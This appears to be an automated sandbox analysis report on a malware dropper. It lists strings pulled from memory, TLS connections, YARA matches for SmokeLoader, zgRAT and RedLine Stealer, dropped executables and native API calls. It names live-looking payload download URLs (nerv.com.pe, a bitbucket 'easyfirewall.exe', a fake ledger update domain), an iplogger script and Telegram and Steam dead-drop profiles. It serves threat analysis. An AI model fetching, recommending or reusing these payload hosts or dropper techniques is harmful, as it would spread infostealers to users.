Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-net-iwa
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-net-system-browsers
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-net-up
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-net-up)
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/net-cache-persistence-errors.
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.msa/msal-net-3x-cache-breaking-change
Source: RK8ajtyf9pvKlaXEo3EjTbnu.exe, 0000000D.00000002.1840912575.00000000037B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org/;
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org/?format=json
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org/?format=jsonO
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org:443/?format=json
Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/F
Source: RegAsm.exe, 00000002.00000002.1669605401.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/bbfbfb0f-4597-4ff3-b025-124f61baf271/downloads/7f30c6a5-e68f-
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/&
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/9
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/kcatelin/jameson/downloads/easyfirewall.exe
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/kcatelin/jameson/downloads/easyfirewall.exeC:
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/kcatelin/jameson/downloads/easyfirewall.exee
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/kcatelin/jameson/downloads/easyfirewall.exein
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/kcatelin/jameson/downloads/easyfirewall.exeovider
Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org:80/kcatelin/jameson/downloads/easyfirewall.exe
Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org:80/kcatelin/jameson/downloads/easyfirewall.exek
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://enterpriseregistration.windows.net/
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2815756662.00000000014A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: RegAsm.exe	String found in binary or memory: https://ipgeolocation.io/
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1346588217.000000000420F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1346588217.00000000041A4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/https://ipgeolocation.io/::
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/s
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33Gn
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33_
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/
Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/$
Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1nhuM4.js
Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1nhuM4.jsm
Source: RegAsm.exe, 00000002.00000002.1668271812.000000000455E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org:443/1nhuM4.jsx
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://login.microsoftonline.com/common
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://login.microsoftonline.com=https://login.chinacloudapi.cnAhttps://login.microsoftonline.deAht
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe/
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe/sdhsfd.exe
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe/sdhsfd.exeC:
Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe/sdhsfd.exez
Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe/vfsdgdf.exe
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe/vfsdgdf.exeC:
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe/vfsdgdf.exeY2=
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.000000000455E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe/vsfdhgg15.exe
Source: RegAsm.exe, 00000002.00000002.1668271812.000000000455E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe/vsfdhgg15.exe3t
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe/vsfdhgg15.exe705d09
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe/vsfdhgg15.exeC:
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe:80/
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe:80/5.44.104/prog/66e705d09b33c_jack.exe
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe:80/sdhsfd.exe
Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe:80/sdhsfd.exei
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe:80/sdhsfd.exelfb
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe:80/sdhsfd.exe~at
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe:80/vfsdgdf.exe
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe:80/vfsdgdf.exe6f
Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe:80/vsfdhgg15.exe
Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe:80/vsfdhgg15.exe2
Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nerv.com.pe:80/vsfdhgg15.exeg
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://sso2urn:ietf:wg:oauth:2.0:oob
Source: JxvL46JFox50ORU3tEsaxZ2Y.exe, 00000006.00000002.1888965030.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, LeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: JxvL46JFox50ORU3tEsaxZ2Y.exe, 00000006.00000002.1888965030.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, LeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: JxvL46JFox50ORU3tEsaxZ2Y.exe, 00000006.00000002.1888965030.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, LeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000000.1618549346.0000000000887000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://update-ledger.net/update
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.nuget.org/packages/Microsoft.Identity.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown	HTTPS traffic detected: 173.231.16.77:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.9:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.61.218:443 -> 192.168.2.9:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.61.218:443 -> 192.168.2.9:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.231.236.201:443 -> 192.168.2.9:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.161:443 -> 192.168.2.9:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.9:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.165.127:443 -> 192.168.2.9:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.132.206.251:443 -> 192.168.2.9:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.9:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.165.127:443 -> 192.168.2.9:49792 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2510215507.0000000002561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp8FCF.tmp			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp8FFF.tmp			Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.2511522701.0000000002600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.2521250191.00000000026BE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000C.00000002.2510215507.0000000002561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown

Drops large PE files

Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	File dump: service123.exe.9.dr 314613760			Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	File dump: ClientSecureUpdater.exe.15.dr 976632104			Jump to dropped file

Uses powercfg.exe to modify the power settings

Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe

Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042CD50 __aulldiv,VirtualAlloc,__aulldiv,__aulldiv,NtQuerySystemInformation,__aulldiv,WideCharToMultiByte,CharToOemA,VirtualFree,__aulldiv,	2_2_0042CD50
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	12_2_00401514
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_00402F97 VirtualProtect,RtlCreateUserThread,NtTerminateProcess,	12_2_00402F97
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	12_2_00401542
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_00403247 NtTerminateProcess,RtlInitUnicodeString,	12_2_00403247
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	12_2_00401549
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_0040324F NtTerminateProcess,RtlInitUnicodeString,	12_2_0040324F
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_00403256 NtTerminateProcess,RtlInitUnicodeString,	12_2_00403256
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	12_2_00401557
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_0040326C NtTerminateProcess,RtlInitUnicodeString,	12_2_0040326C
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_00403277 NtTerminateProcess,	12_2_00403277
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	12_2_004014FE
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_00403290 NtTerminateProcess,RtlInitUnicodeString,	12_2_00403290
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041B16F NtQueryDefaultLocale,ExitProcess,	15_2_0041B16F
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004199E9 NtQueryDefaultLocale,	15_2_004199E9
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_0041B347 NtQueryDefaultLocale,ExitProcess,	15_2_0041B347
